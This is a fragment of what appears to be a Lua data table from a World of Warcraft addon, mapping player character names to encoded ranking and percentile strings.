["Lulzadr"] = "RB:506/70%RM:654/73%",
["Bussy"] = "RB:423/56%RM:584/64%",
["Xhena"] = "CB:42/4%UM:250/25%",
["Fleamarket"] = "CB:192/23%UM:344/36%",
["Holyslash"] = "UM:332/35%",
["Ibuprofenn"] = "CB:30/3%RM:643/69%",
["Vanishingg"] = "RB:481/67%EM:789/85%",
["Beguile"] = "CT:56/19%RB:384/52%RM:523/54%",
["Truethat"] = "LB:772/97%LM:959/97%",
["Terpgodd"] = "EB:674/91%EM:891/93%",
["Newms"] = "EB:726/92%LM:936/95%",
["Lethalthreat"] = "EM:726/79%",
["Easymage"] = "CM:179/17%",
["Trixi"] = "EB:690/88%RM:697/72%",
["Rankonehw"] = "RM:528/54%",
["Rnballnight"] = "EB:711/89%EM:858/88%",
["Onefish"] = "CB:165/19%EM:688/76%",
["Thinkwill"] = "CM:219/22%",
["Gustavich"] = "UM:301/31%",
["Heymami"] = "RM:506/53%",
["Espresso"] = "EB:680/86%EM:830/86%",
["Châlice"] = "LB:758/96%EM:920/94%",
["Tfarcraw"] = "EB:729/92%EM:922/94%",
["Sookja"] = "LB:740/96%SM:988/99%",
["Meeples"] = "EB:724/92%EM:821/87%",
["Holygay"] = "EB:628/86%RM:691/73%",
["Grondal"] = "LT:607/98%EB:435/82%EM:554/85%",
["Valitrix"] = "EB:681/87%EM:729/76%",
["Tlc"] = "UB:262/34%EM:771/82%",
["Seriie"] = "CM:127/10%",
["Nvpally"] = "EB:596/82%RM:673/74%",
["Bigthicc"] = "CM:108/13%",
["Fünkÿ"] = "CB:91/11%RM:626/67%",
["Enlightning"] = "RB:402/55%EM:678/75%",
["Ðotctor"] = "RB:502/65%EM:847/87%",
["Mordz"] = "CT:74/9%RB:474/62%EM:727/76%",
["Zardryx"] = "RB:581/74%EM:705/75%",
["Evered"] = "CB:205/24%UM:372/39%",
["Stubbles"] = "RB:501/64%RM:519/55%",
["Elitethot"] = "EM:800/90%",
["Peaches"] = "CB:120/15%RM:570/59%",
["Zight"] = "UB:303/38%EM:853/88%",
["Norrco"] = "UT:125/48%RB:515/68%RM:469/68%",
["Sharlycheen"] = "RB:387/52%EM:719/78%",
["Bornlesszero"] = "EB:677/91%LM:967/98%",
["Pokyhealz"] = "CB:45/3%RM:491/54%",
["Toegrime"] = "EB:610/83%EM:712/78%",
["Honeywell"] = "EB:727/94%LM:938/96%",
["Jawstee"] = "EB:684/90%EM:839/92%",
["Daralorn"] = "UM:315/32%",
["Smokymcburr"] = "RB:210/54%RM:611/67%",
["Axetømouth"] = "EB:731/92%LM:950/96%",
["Bottles"] = "EB:663/84%EM:880/90%",
["Slicenugget"] = "EB:642/81%EM:850/87%",
["Sunhou"] = "CM:164/15%",
["Shrëk"] = "EB:531/93%EM:855/90%",
["Mairon"] = "UM:343/36%",
["Smaer"] = "RM:270/54%",
["Nerdlinger"] = "UM:107/41%",
["Cactus"] = "RB:455/57%RM:620/66%",
["Chromeshine"] = "EB:667/85%EM:828/86%",
["Dirtysgirl"] = "EB:558/77%EM:679/75%",
["Warrlockk"] = "RB:395/51%RM:517/53%",
["Caniblecorps"] = "UM:268/27%",
["Vyscì"] = "EB:731/92%LM:972/98%",
["Sammouse"] = "EB:685/86%EM:897/91%",
["Jobot"] = "CB:40/4%RM:619/66%",
["Hugzy"] = "LB:760/97%LM:940/97%",
["Kotag"] = "EB:599/76%EM:749/79%",
["Arstotzka"] = "CB:143/17%CM:170/16%",
["Durokal"] = "UB:144/41%UM:301/49%",
["Kaat"] = "CB:84/8%RM:561/62%",
["Healswag"] = "EB:714/94%EM:866/91%",
["Ketzalcoatl"] = "LB:743/96%LM:928/97%",
["Evilicious"] = "LB:783/98%LM:950/96%",
["Owlpacino"] = "ET:578/75%EB:435/76%LM:869/98%",
["Darklocked"] = "CB:146/19%CM:223/22%",
["Kehy"] = "RB:462/63%EM:735/80%",
["Nitrass"] = "EB:540/83%EM:532/77%",
["Nightraven"] = "CB:173/20%CM:193/18%",
["Krãmer"] = "CT:90/8%RB:429/59%EM:722/79%",
["Iamajuju"] = "RM:518/55%",
["Peachpeach"] = "CT:30/1%EB:553/77%UM:327/42%",
["Oots"] = "UT:371/47%LB:742/96%EM:858/90%",
["Ænigmæ"] = "CT:2/6%CB:54/5%CM:132/12%",
["Killjob"] = "UB:384/48%RM:606/65%",
["Hungryhippo"] = "EB:633/86%EM:872/92%",
["Kooyox"] = "RT:317/69%EB:673/91%EM:877/94%",
["Lubizz"] = "CT:32/9%CB:67/6%UM:331/41%",
["Nûll"] = "UM:362/44%",
["Ezneinqq"] = "RM:555/61%",
["Xyas"] = "EM:692/76%",
["Dutchboi"] = "LT:745/95%LB:654/98%LM:960/98%",
["Liamea"] = "RM:484/53%",
["Arkai"] = "CT:0/1%EB:609/80%RM:630/69%",
["Dríft"] = "UT:82/30%EB:634/86%EM:817/88%",
["Onetoosheep"] = "CT:35/9%RB:469/62%UM:445/48%",
["Dumped"] = "CB:62/6%",
["Sliante"] = "RB:374/73%EM:431/78%",
["Senator"] = "CB:37/3%",
["Arcaidas"] = "RM:717/69%",
["Anauroch"] = "CB:57/5%",
["Stig"] = "SB:811/99%SM:1046/99%",
["Madlad"] = "UM:357/38%",
["Economy"] = "UM:135/47%",
["Ratman"] = "RB:268/61%RM:202/51%",
["Deadmau"] = "RB:498/64%EM:831/86%",
["Byrnhorn"] = "RB:432/56%RM:571/61%",
["Warkawk"] = "EB:660/85%EM:797/83%",
["Charmingbill"] = "CB:146/19%EM:388/80%",
["Jehutie"] = "RM:506/59%",
["Thinkin"] = "UB:364/45%RM:688/73%",
["Aka"] = "EB:731/93%EM:909/94%",
["Sworn"] = "EB:730/92%RM:662/70%",
["Aceprime"] = "SB:849/99%SM:1002/99%",
["Gork"] = "RM:626/67%",
["Santaclawz"] = "SB:897/99%SM:1088/99%",
["Eclips"] = "EB:561/77%EM:773/83%",
["Yuhteed"] = "CB:55/5%CM:188/24%",
["Hayyz"] = "UM:307/39%",
["Lorch"] = "CM:122/13%",
["Bulleme"] = "RB:198/52%RM:229/62%",
["Goonsquad"] = "RM:732/70%",
["Djinz"] = "CB:100/12%CM:220/22%",
["Zurn"] = "EB:674/91%EM:837/89%",
["Angelian"] = "EB:711/90%EM:914/93%",
["Everthirst"] = "EB:630/80%UM:473/49%",
["Evocati"] = "EB:678/91%EM:709/77%",
["Wargrave"] = "EB:740/93%EM:838/87%",
["Lôthar"] = "EB:667/89%EM:749/87%",
["Ahryman"] = "RB:531/74%EM:764/83%",
["Schlimbow"] = "CM:8/2%",
["Pinballer"] = "RB:477/66%CM:146/13%",
["Squirtlé"] = "RB:376/51%RM:222/55%",
["Rhon"] = "EB:637/82%EM:820/85%",
["Cgammoh"] = "LB:749/95%EM:878/91%",
["Bleeditout"] = "EB:746/94%EM:846/88%",
["Russanno"] = "CB:75/6%UM:260/26%",
["Hammeredmonk"] = "EB:553/77%EM:826/89%",
["Deathheal"] = "EB:656/89%EM:749/82%",
["Pepitos"] = "LB:791/98%LM:939/96%",
["Tochainz"] = "LB:773/97%EM:930/94%",
["Yss"] = "ET:702/90%LB:755/95%LM:938/95%",
["Hiatsu"] = "LB:777/97%LM:935/95%",
["Proofx"] = "LB:754/95%EM:820/85%",
["Irelïa"] = "LB:793/98%LM:942/96%",
["Raîsehell"] = "UB:268/34%UM:274/28%",
["Heyimgreg"] = "EB:579/80%EM:765/83%",
["Critasm"] = "EM:726/76%",
["Troglok"] = "EB:622/87%EM:859/93%",
["Klonklon"] = "CM:95/8%",
["Devlord"] = "UB:344/45%CM:244/24%",
["Greymanne"] = "RB:563/72%LM:952/95%",
["Calidity"] = "CM:229/23%",
["Nbot"] = "UB:236/31%RM:525/62%",
["Mufarsa"] = "CM:147/13%",
["Mayb"] = "CB:198/24%UM:419/45%",
["Skinnymayne"] = "RB:408/51%EM:785/82%",
["Inkredible"] = "RB:408/52%RM:596/62%",
["Jackoftrades"] = "CB:132/14%RM:641/71%",
["Surrey"] = "LB:711/95%EM:851/91%",
["Vangoghseye"] = "CB:66/7%RM:611/67%",
["Mimichaobai"] = "CB:81/9%CM:232/23%",
["Lavenderr"] = "EB:658/85%EM:908/92%",
["Janerius"] = "CB:101/10%CM:70/5%",
["Rammy"] = "CM:160/14%",
["Lokio"] = "SB:804/99%SM:1003/99%",
["Pandacosmos"] = "UM:291/28%",
["Oldxgg"] = "EB:742/93%EM:888/91%",
["Orangeb"] = "EB:716/91%EM:710/75%",
["Maybecrazy"] = "UM:448/48%",
["Sixbeers"] = "UB:206/25%UM:457/48%",
["Alrob"] = "RB:404/52%RM:629/67%",
["Mdub"] = "EB:694/92%EM:841/89%",
["Heizel"] = "RB:475/67%RM:527/58%",
["Huntergo"] = "CM:52/3%",
["Jerk"] = "EB:735/93%EM:836/88%",
["Moamo"] = "EB:686/88%EM:805/86%",
["Prehot"] = "UB:259/32%CM:157/14%",
["Jafar"] = "EB:593/82%EM:798/87%",
["Untorrikk"] = "UB:368/49%RM:647/71%",
["Enrage"] = "LB:748/95%LM:956/97%",
["Okusa"] = "EB:738/93%EM:861/89%",
["Kotalkhan"] = "EB:541/80%EM:681/81%",
["Drengo"] = "UM:336/33%",
["Missread"] = "EB:593/81%EM:715/78%",
["Hngryhippo"] = "CB:170/21%CM:217/20%",
["Whisstler"] = "EB:691/88%EM:821/85%",
["Snapcasting"] = "EB:732/93%EM:919/94%",
["Fourkbenjie"] = "EB:695/87%EM:847/87%",
["Badline"] = "EB:622/79%EM:804/84%",
["Agrimace"] = "RB:575/74%RM:641/68%",
["Zibzib"] = "EB:579/79%EM:690/76%",
["Deathmagi"] = "EM:722/78%",
["Haunter"] = "EB:719/91%LM:956/97%",
["Revzhealz"] = "UB:325/43%UM:422/45%",
["Drunkluck"] = "EB:602/83%EM:832/92%",
["Reorxx"] = "CM:135/15%",
["Roar"] = "SB:831/99%SM:1044/99%",
["Mabney"] = "EB:603/79%EM:812/86%",
["Tulaza"] = "EB:610/80%EM:750/81%",
["Senko"] = "CM:33/2%",
["Huntér"] = "UM:353/35%",
["Evilspirit"] = "RB:518/69%EM:689/75%",
["Ankri"] = "RB:523/72%RM:475/52%",
["Snooppup"] = "CM:31/1%",
["Bloodshred"] = "EM:736/88%",
["Siidin"] = "RB:458/60%RM:667/71%",
["Genteel"] = "UT:121/39%EB:653/88%EM:868/91%",
["Qtblues"] = "EB:662/90%EM:787/86%",
["Cbkflame"] = "LB:757/95%EM:817/85%",
["Freezin"] = "UM:265/27%",
["Sancho"] = "RT:460/60%LB:769/98%LM:917/95%",
["Tethers"] = "LB:785/98%EM:929/94%",
["Punchthelion"] = "EB:751/94%EM:775/81%",
["Spritzer"] = "CB:165/20%CM:180/17%",
["Battlewagon"] = "EB:728/91%EM:874/93%",
["Tristán"] = "EB:647/88%LM:943/97%",
["Frostybolts"] = "EB:728/93%LM:932/95%",
["Bamblacha"] = "EB:625/82%EM:766/82%",
["Beppinsan"] = "EB:749/94%LM:948/96%",
["Otol"] = "UB:274/34%UM:428/43%",
["Arepa"] = "RB:508/67%EM:795/83%",
["Melancholy"] = "EB:636/87%LM:934/96%",
["Insanedps"] = "LB:772/97%EM:848/92%",
["Dafreezer"] = "EB:606/80%EM:689/75%",
["Posillo"] = "EB:703/90%EM:863/90%",
["Lífe"] = "EB:715/90%EM:831/91%",
["Napoleonwest"] = "SB:834/99%LM:973/98%",
["Felix"] = "RM:490/66%",
["Yubera"] = "RB:491/63%EM:749/78%",
["Dreznig"] = "EB:604/79%RM:669/71%",
["Jugernautz"] = "LB:758/95%LM:948/96%",
["Judgey"] = "UB:340/45%CM:176/16%",
["Bruv"] = "LB:775/97%LM:987/98%",
["Chnz"] = "EB:684/90%EM:801/90%",
["Spiritmage"] = "CB:38/3%UM:441/48%",
["Luciá"] = "RB:576/73%RM:477/50%",
["Kayern"] = "LB:714/95%EM:793/86%",
["Zuna"] = "LB:776/97%LM:952/97%",
["Shaqtastic"] = "LB:757/95%SM:1007/99%",
["Airius"] = "CB:103/10%EM:515/84%",
["Burough"] = "RB:511/67%RM:678/72%",
["Cosmicdust"] = "EB:705/89%EM:890/91%",
["Bêe"] = "EB:633/90%EM:855/94%",
["Flyfish"] = "UM:304/34%",
["Raintrees"] = "RM:180/63%",
["Kazeni"] = "CM:233/23%",
["Obv"] = "CM:220/22%",
["Stoneheave"] = "CM:35/13%",
["Shaungdawg"] = "LB:752/97%LM:950/97%",
["Modoch"] = "CM:40/2%",
["Ugoz"] = "RB:510/71%EM:751/81%",
["Moregreen"] = "EM:754/77%",
["Rudin"] = "UM:449/49%",
["Nemyt"] = "EB:679/90%EM:884/92%",
["Kudokuten"] = "UM:359/36%",
["Leenz"] = "UM:321/32%",
["Karuna"] = "LB:715/95%LM:926/96%",
["Fannypackjoe"] = "CB:181/21%UM:357/37%",
["Pallydan"] = "RB:412/56%RM:582/64%",
["Phawkit"] = "RB:465/64%EM:753/82%",
["Ruifeix"] = "UB:315/40%UM:380/38%",
["Lbjyy"] = "EB:624/85%EM:813/87%",
["Thegecko"] = "EB:656/85%RM:674/74%",
["Calibrate"] = "UB:244/31%UM:269/27%",
["Buzzette"] = "RM:603/65%",
["Cykwhi"] = "CM:244/24%",
["Oop"] = "CB:34/3%CM:146/14%",
["Kardee"] = "EB:616/85%EM:787/86%",
["Ultrademon"] = "EB:608/79%RM:665/69%",
["Illz"] = "CM:146/18%",
["Arktor"] = "EB:632/91%EM:762/91%",
["Jiigsàw"] = "RB:407/51%RM:689/73%",
["Beastbane"] = "UM:281/27%",
["Cherryl"] = "RB:440/56%RM:556/59%",
["Xiaolaomeier"] = "CB:107/11%CM:210/20%",
["Windtransfor"] = "EB:607/88%EM:719/87%",
["Skylean"] = "CM:168/18%",
["Gugian"] = "RB:483/61%EM:710/75%",
["Skty"] = "UB:221/27%RM:642/68%",
["Nhaha"] = "CT:45/10%EB:643/81%RM:641/68%",
["Angerfish"] = "CB:205/21%UM:427/44%",
["Kboys"] = "CM:41/16%",
["Seanbudsbud"] = "EB:667/89%EM:800/86%",
["Lofan"] = "CB:60/6%CM:242/24%",
["Alion"] = "CB:167/21%RM:686/71%",
["Shaiem"] = "RM:514/53%",
["Juliammius"] = "CM:52/3%",
["Nchantress"] = "RB:398/51%RM:603/62%",
["Oopsiforted"] = "EB:560/78%EM:744/81%",
["Swoosh"] = "RB:489/62%RM:649/69%",
["Caerulean"] = "UB:206/25%RM:460/50%",
["Fatderick"] = "SB:782/99%LM:927/97%",
["Warpath"] = "UT:191/38%EB:719/93%EM:888/94%",
["Killburnll"] = "ET:228/78%EB:687/91%EM:810/90%",
["Belledelphne"] = "CM:27/0%",
["Banpron"] = "CT:49/5%EB:677/86%EM:919/93%",
["Skool"] = "CT:30/6%UM:441/46%",
["Hashtagprot"] = "EM:705/80%",
["Momomomoo"] = "CB:26/0%",
["Imstoof"] = "CM:139/16%",
["Kronic"] = "UT:115/41%CB:146/16%RM:655/73%",
["Nyssa"] = "CM:96/8%",
["Trapt"] = "RT:220/64%EB:636/90%EM:825/92%",
["Yourdúmb"] = "RT:167/60%EB:427/81%EM:852/88%",
["Brennaa"] = "EB:673/86%EM:725/76%",
["Shwartskie"] = "EB:661/85%EM:833/86%",
["Doominarch"] = "EB:637/82%RM:657/68%",
["Côkey"] = "ET:733/94%LB:763/96%LM:944/96%",
["Dioraddict"] = "UB:320/36%CM:95/11%",
["Uaex"] = "CB:61/7%",
["Unfairbanks"] = "CB:93/8%EM:695/76%",
["Zerloth"] = "RB:447/61%EM:884/92%",
["Mintyx"] = "RB:257/59%RM:507/53%",
["Nikolai"] = "UB:191/45%EM:882/90%",
["Jayenzo"] = "SB:814/99%SM:1008/99%",
["Silentstaby"] = "CB:76/9%RM:463/52%",
["Arctúrus"] = "CM:19/4%",
["Margerise"] = "CB:147/16%CM:61/21%",
["Raon"] = "UB:208/25%EM:806/84%",
["Floridamaing"] = "RM:606/55%",
["Xanth"] = "EB:681/87%EM:918/94%",
["Harskare"] = "UT:241/32%EB:703/89%EM:932/94%",
["Rockyspade"] = "CT:160/20%EB:738/94%LM:954/96%",
["Yukara"] = "EB:600/76%EM:818/79%",
["Atlys"] = "RT:187/58%EB:650/89%RM:588/66%",
["Nayvihn"] = "CB:88/8%RM:487/66%",
["Frenchie"] = "EB:655/89%EM:799/86%",
["Goobatron"] = "CB:96/10%EM:621/82%",
["Poetyk"] = "UB:357/48%CM:16/23%",
["Treet"] = "CB:134/15%RM:694/73%",
["Edang"] = "LB:757/95%LM:979/98%",
["Shadowmatter"] = "EB:587/76%RM:660/68%",
["Sinar"] = "CM:159/16%",
["Eclairer"] = "EB:591/81%EM:772/83%",
["Lunch"] = "UB:197/37%EM:851/92%",
["Nófearward"] = "EB:686/93%EM:841/90%",
["Kourah"] = "EB:724/92%EM:894/93%",
["Screto"] = "EB:707/91%LM:933/95%",
["Doxastab"] = "RB:426/54%RM:568/61%",
["Bonusnapkins"] = "EB:629/80%EM:721/76%",
["Elvyna"] = "UM:431/45%",
["Xiffar"] = "CB:97/11%RM:642/68%",
["Telenovela"] = "CM:204/19%",
["Phixion"] = "UM:440/48%",
["Josteax"] = "CB:99/12%RM:485/51%",
["Scrublin"] = "RM:597/66%",
["Stripclub"] = "CM:141/14%",
["Melludolgurr"] = "RM:427/61%",
["Dystilled"] = "CB:114/12%EM:826/86%",
["Deliberative"] = "LB:798/98%SM:1031/99%",
["Zaith"] = "CB:49/5%CM:86/7%",
["Daepo"] = "RM:620/68%",
["Wickkido"] = "RM:381/65%",
["Kitsilano"] = "LB:761/96%EM:797/85%",
["Lierah"] = "CB:71/9%RM:513/56%",
["Sharpshaman"] = "RM:309/60%",
["Longan"] = "RB:525/69%EM:776/81%",
["Nightlaw"] = "CB:191/24%EM:685/75%",
["Sathanas"] = "UB:291/36%CM:92/9%",
["Tingatumadre"] = "RM:514/57%",
["Krul"] = "CB:52/5%UM:382/39%",
["Auccuatt"] = "RM:362/64%",
["Garrett"] = "EB:648/85%EM:808/86%",
["Kyye"] = "CB:31/2%UM:357/37%",
["Stickyboots"] = "UM:263/27%",
["Stinkybear"] = "RB:466/58%RM:649/69%",
["Hents"] = "UM:270/27%",
["Moonkins"] = "ET:297/80%RB:501/69%EM:724/79%",
["Souseful"] = "RM:579/64%",
["Hotwarrior"] = "EM:572/76%",
["Lazysnail"] = "LB:779/97%EM:814/84%",
["Savagez"] = "CB:146/16%CM:220/21%",
["Ninepercent"] = "UT:313/38%LB:735/97%RM:648/71%",
["Drugcat"] = "EB:709/89%EM:884/90%",
["Ballsybob"] = "CM:151/16%",
["Bartwarr"] = "RB:557/71%EM:724/77%",
["Drezdinn"] = "RM:550/59%",
["Doubao"] = "UB:283/35%UM:396/40%",
["Edgerton"] = "UB:187/25%UM:426/43%",
["Eminent"] = "CM:164/15%",
["Warmbusch"] = "UB:230/29%UM:449/46%",
["Soulfang"] = "RB:504/65%RM:679/72%",
["Deadhead"] = "LB:708/95%EM:886/94%",
["Lashik"] = "RM:619/68%",
["Catchafade"] = "CM:134/12%",
["Spacedout"] = "SB:796/99%SM:998/99%",
["Shyzter"] = "EB:626/80%EM:760/79%",
["Biscuits"] = "RB:551/73%EM:750/81%",
["Rizz"] = "LB:759/95%EM:807/84%",
["Graybeard"] = "RB:476/66%EM:744/87%",
["Hulklol"] = "RB:447/57%UM:434/46%",
["Bbuni"] = "UB:279/35%RM:519/53%",
["Relique"] = "UM:28/33%",
["Gronkspike"] = "EB:702/88%EM:782/82%",
["Echoho"] = "RM:337/60%",
["Laodaa"] = "UM:355/42%",
["Ayle"] = "CM:238/23%",
["Tsukuyomí"] = "EB:642/81%EM:808/84%",
["Skan"] = "RM:756/71%",
["Iconofsinx"] = "UB:81/49%CM:110/9%",
["Absølute"] = "LB:721/96%EM:871/94%",
["Beanhead"] = "EM:711/83%",
["Hotsauce"] = "UM:427/45%",
["Ignites"] = "EB:687/89%EM:904/93%",
["Ibrahimovic"] = "CM:241/24%",
["Faramond"] = "EM:848/89%",
["Crackspider"] = "EB:674/85%EM:902/92%",
["Valygar"] = "EB:631/86%EM:681/83%",
["Rendon"] = "EB:463/89%EM:892/92%",
["Nebuli"] = "RB:256/62%EM:570/75%",
["Drussano"] = "LB:751/97%LM:950/97%",
["Splurge"] = "EB:681/86%EM:805/84%",
["Eveejr"] = "UB:279/36%RM:479/53%",
["Parried"] = "EB:713/93%LM:937/96%",
["Amorgor"] = "EB:656/84%EM:749/79%",
["Andbb"] = "EB:572/75%RM:701/74%",
["Dollars"] = "UM:317/33%",
["Alarkos"] = "RB:520/68%EM:760/79%",
["Kittybearcow"] = "EB:624/85%EM:845/90%",
["Deanchi"] = "RB:423/54%RM:703/68%",
["Raßa"] = "RB:145/63%RM:422/70%",
["Zander"] = "CB:136/14%RM:464/53%",
["Danofwar"] = "UM:371/38%",
["Rejuvenuto"] = "SB:789/99%SM:1024/99%",
["Lilmayo"] = "EB:618/78%EM:754/79%",
["Evilss"] = "RB:296/59%EM:587/77%",
["Anoluldoran"] = "LB:764/96%LM:995/98%",
["Spoochy"] = "UB:261/31%UM:427/45%",
["Hunty"] = "RT:475/65%RB:533/72%RM:517/54%",
["Aresya"] = "RB:508/67%EM:752/79%",
["Rikov"] = "LB:780/97%LM:981/98%",
["Srewolf"] = "CB:97/11%CM:85/7%",
["Stolass"] = "EB:593/75%EM:877/87%",
["Odinsbanker"] = "CM:148/14%",
["Baelkazum"] = "RB:532/71%UM:333/34%",
["Skeezo"] = "EB:749/94%LM:941/96%",
["Lilkeed"] = "UM:90/47%",
["Havocis"] = "UB:120/38%UM:223/43%",
["Ucokk"] = "CM:196/19%",
["Leego"] = "EB:598/79%EM:815/86%",
["Lightgiver"] = "RM:269/60%",
["Lildotty"] = "EM:777/77%",
["Haggies"] = "RB:528/73%EM:840/89%",
["Huntturd"] = "RB:493/67%RM:694/73%",
["Archarian"] = "EB:715/90%EM:872/89%",
["Sanchdaddy"] = "RB:500/63%RM:579/62%",
["Nayabinghi"] = "LB:765/96%LM:924/95%",
["Cosmicink"] = "CM:128/11%",
["Wayneroy"] = "EB:618/78%EM:761/80%",
["Ray"] = "RB:296/64%RM:486/70%",
["Malfarius"] = "EB:729/93%EM:855/90%",
["Sírvlad"] = "EB:571/79%RM:658/72%",
["Rx"] = "RB:478/66%RM:645/71%",
["Dwarvenfrost"] = "EB:729/93%LM:984/98%",
["Doublepans"] = "UB:209/26%CM:240/24%",
["Comefme"] = "UM:261/26%",
["Sissiakane"] = "RB:418/57%RM:553/61%",
["Undeadtrollz"] = "CB:31/2%UM:354/37%",
["Aegle"] = "EB:706/94%LM:930/96%",
["Littlechilly"] = "UB:285/38%RM:632/73%",
["Muffldredman"] = "CB:195/20%CM:109/13%",
["Jacbob"] = "EB:709/89%EM:815/84%",
["Ghostfire"] = "EB:574/86%EM:807/92%",
["Lahmi"] = "EB:593/82%EM:826/89%",
["Deletê"] = "EM:713/77%",
["Joseppi"] = "LB:752/95%EM:843/87%",
["Yurezum"] = "EB:658/89%EM:859/91%",
["Shalmo"] = "UB:252/31%EM:852/88%",
["Eidola"] = "CM:132/13%",
["Wunzy"] = "LB:746/95%EM:865/93%",
["Chairmage"] = "CM:30/1%",
["Clint"] = "RB:420/51%EM:724/77%",
["Shrip"] = "LB:769/96%LM:962/97%",
["Xyle"] = "LB:762/95%EM:909/92%",
["Lifë"] = "EB:635/87%LM:921/96%",
["Thiccbottom"] = "CM:25/0%",
["Slyvanos"] = "RB:477/63%EM:728/77%",
["Dug"] = "LB:756/97%LM:925/96%",
["Twiigi"] = "CB:37/2%CM:64/4%",
["Cromagg"] = "RB:449/56%RM:611/65%",
["Ujío"] = "CB:171/20%CM:167/16%",
["Ckyourself"] = "LB:774/97%LM:963/97%",
["Starvinmonky"] = "SB:798/99%LM:922/96%",
["Faeric"] = "LB:754/95%EM:832/86%",
["Streusel"] = "LB:759/98%SM:988/99%",
["Popsecret"] = "UB:243/30%UM:479/49%",
["Seniorsparkl"] = "UB:98/35%RM:299/65%",
["Dùck"] = "EB:562/78%EM:841/89%",
["Feltpoo"] = "UB:363/46%RM:573/61%",
["Omps"] = "LB:751/95%LM:951/96%",
["Goobini"] = "SB:798/99%LM:965/97%",
["Local"] = "EB:587/81%EM:746/82%",
["Icup"] = "LB:749/95%LM:945/96%",
["Dethers"] = "UB:386/49%EM:798/83%",
["Midget"] = "UB:328/37%UM:385/39%",
["Gannicux"] = "RB:472/59%RM:667/71%",
["Enduras"] = "LB:707/95%EM:862/92%",
["Nefariasbred"] = "CB:40/4%RM:557/61%",
["Papsmeer"] = "LB:770/97%LM:966/97%",
["Lura"] = "LB:785/98%SM:1004/99%",
["Koltaine"] = "SB:811/99%LM:990/98%",
["Narrcu"] = "LB:781/98%LM:954/97%",
["Hakon"] = "LB:781/97%SM:1025/99%",
["Randomizee"] = "RB:533/71%EM:804/85%",
["Azzii"] = "EB:734/92%LM:974/97%",
["Colrok"] = "CB:183/23%RM:523/57%",
["Toufuskin"] = "RB:508/70%RM:664/73%",
["Yiyi"] = "ET:695/90%EB:736/93%LM:932/95%",
["Fuse"] = "SB:794/99%LM:968/98%",
["Rachelmaddow"] = "EB:725/92%EM:879/91%",
["Icekewb"] = "UM:413/44%",
["Dragomeer"] = "UT:306/39%EB:609/84%",
["Walia"] = "CT:151/24%UB:233/31%RM:208/58%",
["Shirosora"] = "CT:23/9%",
["Randaron"] = "RM:538/74%",
["Drazmi"] = "CT:61/6%EM:558/78%",
["Kaiikai"] = "EB:567/75%RM:635/68%",
["Kaikaii"] = "ET:664/90%LB:644/97%EM:828/92%",
["Zyod"] = "UM:210/27%",
["Badclam"] = "EB:657/84%EM:791/82%",
["Weeman"] = "RB:514/67%EM:746/78%",
["Thump"] = "UB:261/33%RM:686/73%",
["Bierstein"] = "EB:696/89%EM:722/75%",
["Holykrux"] = "RT:178/57%EB:527/92%LM:965/98%",
["Xcon"] = "LB:796/98%LM:962/97%",
["Backspasm"] = "RB:554/71%RM:588/63%",
["Emora"] = "CM:99/8%",
["Thebronx"] = "UT:332/41%UB:332/46%CM:152/18%",
["Jethereme"] = "EB:671/91%LM:908/95%",
["Bowbarian"] = "CB:173/21%RM:663/70%",
["Rumorborn"] = "EM:796/83%",
["Jynthui"] = "EM:713/88%",
["Muffinhunter"] = "CB:76/8%CM:224/21%",
["Leaferikson"] = "UM:343/36%",
["Cloudstrike"] = "RB:401/55%EM:710/78%",
["Ggscrubz"] = "LB:790/98%LM:978/98%",
["Sukmydot"] = "UB:251/31%RM:492/50%",
["Sublíme"] = "CB:75/21%CM:62/8%",
["Subliminal"] = "EB:634/80%EM:795/82%",
["Judaubo"] = "UM:435/47%",
["Peekaboo"] = "EM:709/75%",
["Guapxx"] = "RB:542/71%EM:759/80%",
["Berate"] = "EB:732/92%EM:894/92%",
["Bignblack"] = "EB:626/79%EM:814/85%",
["Serther"] = "EB:644/87%LM:922/95%",
["Sammeth"] = "EB:661/83%EM:792/83%",
["Slickkjamess"] = "EB:666/86%EM:822/87%",
["Ice"] = "EB:726/92%LM:931/95%",
["Recovered"] = "RB:412/56%RM:495/54%",
["Ion"] = "RB:562/74%EM:734/77%",
["Drewbee"] = "RM:522/57%",
["Scroon"] = "CB:200/24%RM:653/72%",
["Iamadruidlol"] = "RM:514/57%",
["Warmiek"] = "UM:379/38%",
["Holythott"] = "RM:666/73%",
["Sijsu"] = "LB:778/97%LM:973/98%",
["Autovendor"] = "UB:342/44%EM:721/78%",
["Muck"] = "EB:735/92%EM:876/90%",
["Meeche"] = "RB:552/71%EM:925/92%",
["Imfatirl"] = "UM:346/35%",
["Protassium"] = "CM:72/9%",
["Isitandpee"] = "EB:706/93%LM:945/97%",
["Fatalsnack"] = "EB:655/83%EM:827/85%",
["Granddadpurp"] = "RB:526/73%EM:806/87%",
["Totemchucker"] = "RB:373/51%RM:617/68%",
["Pâipai"] = "UB:248/31%CM:153/15%",
["Brucejuice"] = "EB:714/90%EM:816/84%",
["Lìfe"] = "SB:823/99%SM:1051/99%",
["Magechunks"] = "UB:203/25%RM:501/55%",
["ßm"] = "EB:655/83%RM:674/72%",
["Anticept"] = "LB:771/97%LM:978/98%",
["Stigflow"] = "EB:643/81%RM:539/58%",
["Andsulad"] = "UB:310/41%RM:480/52%",
["Holymorde"] = "CM:191/18%",
["Kaedric"] = "RB:502/64%RM:583/62%",
["Whitewalkers"] = "EB:735/93%EM:801/83%",
["Shwag"] = "EM:925/94%",
["Elelaar"] = "EB:734/92%EM:928/94%",
["Iraeve"] = "LM:899/96%",
["Tehgosu"] = "LB:788/98%LM:943/95%",
["Niteside"] = "CM:208/21%",
["Policecar"] = "EB:740/94%LM:931/95%",
["Mke"] = "CB:27/0%RM:476/53%",
["Jihnn"] = "UM:326/34%",
["Blasthole"] = "RM:537/59%",
["Vato"] = "EB:713/90%EM:906/92%",
["Exomage"] = "CB:87/22%RM:513/56%",
["Tidex"] = "LB:781/98%SM:1018/99%",
["Ita"] = "EB:652/85%RM:669/73%",
["ßuda"] = "SB:796/99%LM:955/96%",
["Pumperdono"] = "LB:794/98%EM:889/91%",
["Ventine"] = "CB:88/10%UM:468/48%",
["Narith"] = "CM:109/13%",
["Chorecraft"] = "CT:153/16%UM:376/40%",
["Barglargler"] = "UM:427/46%",
["Gilfer"] = "CB:89/22%RM:319/62%",
["Grayfrost"] = "UM:367/39%",
["Lilrem"] = "EM:888/91%",
["Drift"] = "EB:750/94%LM:989/98%",
["Grealish"] = "LB:759/95%LM:941/95%",
["Rednike"] = "LB:747/95%EM:913/94%",
["Mgdier"] = "EB:599/79%EM:736/79%",
["Thiccrogue"] = "UB:338/45%EM:719/76%",
["Chillchill"] = "RB:498/69%EM:876/94%",
